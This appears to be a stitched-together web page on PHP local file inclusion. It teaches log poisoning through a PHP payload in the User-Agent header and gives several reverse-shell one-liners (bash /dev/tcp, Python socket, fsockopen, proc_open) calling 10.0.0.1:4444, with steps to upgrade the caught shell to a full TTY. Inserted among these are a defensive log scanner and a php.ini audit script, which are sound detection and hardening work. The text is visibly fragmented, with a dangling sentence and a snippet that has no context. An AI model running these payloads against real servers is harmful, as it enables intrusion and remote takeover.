If an LFI vulnerability exists, an attacker may use the php://filter wrapper or include a log file that contains PHP code:

```
http://target.com/page.php?file=../../../../var/log/apache2/access.log
```

Then poison the log by sending `<?php system($_GET['cmd']); ?>` in the User-Agent header, so that the include executes it.
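From the defender's side both halves of this technique leave a trace in the same access log: the poisoning request carries a PHP open tag in a header, and the trigger request carries a traversal sequence or a php:// wrapper pointing at a log path. The following scanner is an added example written for this page, not code from the original post; it parses Apache combined-format lines and flags both patterns. The log lines, IP addresses and indicator names are constructed for the example, and decoding is applied twice so that double-encoded traversal is caught as well.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-side indicators: an include() parameter being steered at the
# filesystem (traversal, log paths) or at a PHP stream wrapper.
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
WRAPPER_RE = re.compile(r'\b(?:php|data|expect|phar)://', re.IGNORECASE)
LOG_PATH_RE = re.compile(r'/var/log/|access\.log|error\.log', re.IGNORECASE)
# Header-side indicator: a PHP open tag in a value the server writes to its
# access log, which is what log poisoning looks like to the defender.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)


def decode(value):
    # Decode twice so that double-encoded traversal (%252e%252e) is also caught.
    return unquote(unquote(value))


def analyse_entry(line):
    """Return a dict for one parsed log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\r\n'))
    if m is None:
        return None
    request = m.group('req')
    parts = request.split(' ')
    target = decode(parts[1] if len(parts) >= 2 else request)
    user_agent = decode(m.group('ua'))
    referer = decode(m.group('ref'))

    reasons = []
    if TRAVERSAL_RE.search(target):
        reasons.append('traversal-in-request')
    if WRAPPER_RE.search(target):
        reasons.append('stream-wrapper-in-request')
    if LOG_PATH_RE.search(target):
        reasons.append('log-file-in-request')
    if PHP_TAG_RE.search(user_agent) or PHP_TAG_RE.search(referer):
        reasons.append('php-tag-in-header')
    return {'ip': m.group('ip'), 'time': m.group('ts'),
            'request': request, 'reasons': reasons}


def scan_access_log(lines):
    """Return only the entries that triggered at least one indicator."""
    findings = []
    for line in lines:
        entry = analyse_entry(line)
        if entry and entry['reasons']:
            findings.append(entry)
    return findings


# Constructed sample lines (not from a real server): one benign request, the
# traversal read of the access log, the poisoning request, and an encoded
# php:// wrapper request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /page.php?file=php%3A%2F%2Ffilter%2Fresource%3Dindex.php HTTP/1.1" 200 1024 "-" "curl/8.0"',
]

if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f['time'], f['ip'], ', '.join(f['reasons']), '->', f['request'])
```

Run over a real log, the interesting signal is the combination: the same client first writing a PHP tag into a header and then requesting a path that resolves to the log file. A single header hit can be scanner noise; a header hit followed by a log-path include from the same address is the poisoning sequence described above.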
```php
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
proc_open('cmd.exe', $descriptorspec, $pipes);
```
Simple (nc-like):

```php
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>
```

Python-based (if bash is unavailable):

```php
<?php system("python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"); ?>
```

No system(), pure PHP socket:

```php
<?php $s=fsockopen("10.0.0.1",4444); while(!feof($s)) $c=fread($s,1024); $o=shell_exec($c); fwrite($s,$o); ?>
```
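Every variant above depends on the interpreter exposing system(), shell_exec(), proc_open() or fsockopen() to web code, and on include() being allowed to reach outside the web root. The following audit script is an added example for this page, not code from the original post or from the PHP project; it reads a php.ini fragment and reports which of those controls are missing. The two configurations and the list of functions checked are constructed for the example.

```python
# Functions the payloads on this page rely on: the first six spawn processes,
# the last two open raw sockets from the web server process.
HIGH_RISK_FUNCTIONS = ('system', 'shell_exec', 'exec', 'passthru',
                       'proc_open', 'popen', 'fsockopen', 'pfsockopen')
TRUE_VALUES = {'1', 'on', 'true', 'yes'}


def parse_php_ini(text):
    """Minimal php.ini reader: strips ; comments and [sections], keeps key = value."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('[') or '=' not in line:
            continue
        key, _, value = line.partition('=')
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text):
    """Return a list of (directive, problem) pairs; an empty list means all checks passed."""
    settings = parse_php_ini(text)
    findings = []

    disabled = {f.strip().lower()
                for f in settings.get('disable_functions', '').split(',') if f.strip()}
    missing = [f for f in HIGH_RISK_FUNCTIONS if f not in disabled]
    if missing:
        findings.append(('disable_functions',
                         'still callable from web code: ' + ', '.join(missing)))

    if settings.get('allow_url_include', 'off').lower() in TRUE_VALUES:
        findings.append(('allow_url_include',
                         'enabled; include() accepts remote and data: sources'))

    if not settings.get('open_basedir'):
        findings.append(('open_basedir',
                         'unset; include() can follow ../ to any path readable by the web user, such as /var/log'))
    return findings


# Constructed sample configurations (not taken from any real server).
WEAK_INI = """
[PHP]
; permissive settings as often found on test boxes
allow_url_include = On
disable_functions =
expose_php = On
"""

HARDENED_INI = """
[PHP]
allow_url_include = Off
disable_functions = system,shell_exec,exec,passthru,proc_open,popen,fsockopen,pfsockopen
open_basedir = "/var/www/html:/tmp"
"""

if __name__ == '__main__':
    for name, ini in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        problems = audit_php_ini(ini)
        print(f'{name}: {"OK" if not problems else ""}')
        for directive, problem in problems:
            print(f'  {directive}: {problem}')
```

Treat the result as defence in depth rather than a guarantee: disable_functions only removes the listed entry points, and disabling fsockopen will break legitimate applications that open outbound sockets, so check what the site actually needs before applying the hardened list. open_basedir is the setting that directly blocks the ../../var/log include shown earlier, because the log directory is then outside the permitted tree.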
The basic concept involves:
So you caught your PHP reverse shell. It's ugly: there is no tab completion, text editors like nano won't work, and you can't use su. You have a "dumb" shell.
The Python upgrade trick: most Linux servers have Python installed. Run this command immediately after catching the shell to get a fully interactive TTY:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```
Then press Ctrl+Z to background the shell. On your local machine, type:

```
stty raw -echo
fg
```

Finally, type `export TERM=xterm`. You now have a fully functional shell with arrow keys, tab completion, and text editors.